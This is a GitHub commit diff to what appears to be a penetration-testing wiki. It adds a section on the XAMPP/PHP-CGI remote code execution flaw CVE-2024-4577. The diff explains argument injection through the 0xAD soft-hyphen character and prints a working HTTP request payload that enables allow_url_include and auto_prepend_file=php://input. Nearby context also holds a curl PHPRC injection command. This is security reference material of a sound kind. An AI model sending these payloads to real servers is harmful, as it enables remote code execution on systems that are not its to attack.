Skip to content

Commit

Permalink
GITBOOK-4368: No subject
Browse files Browse the repository at this point in the history
  • Loading branch information
carlospolop authored and gitbook-bot committed Jul 17, 2024
1 parent f9c3fac commit 3559814
Showing 1 changed file with 25 additions and 0 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -336,6 +336,31 @@ If you find a vulnerability that allows you to **modify env variables in PHP** (
* `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
* Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845).

### XAMPP CGI RCE - CVE-2024-4577

The webserver parses HTTP requests and passes them to a PHP script executing a request such as as [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com) as `php.exe cgi.php foo=bar`, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body:

```jsx
-d allow_url_include=1 -d auto_prepend_file=php://input
```

Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check. the exploit example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/):

```jsx
POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
<?php
phpinfo();
?>
```
## PHP Static analysis
Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):
Expand Down

0 comments on commit 3559814

Please sign in to comment.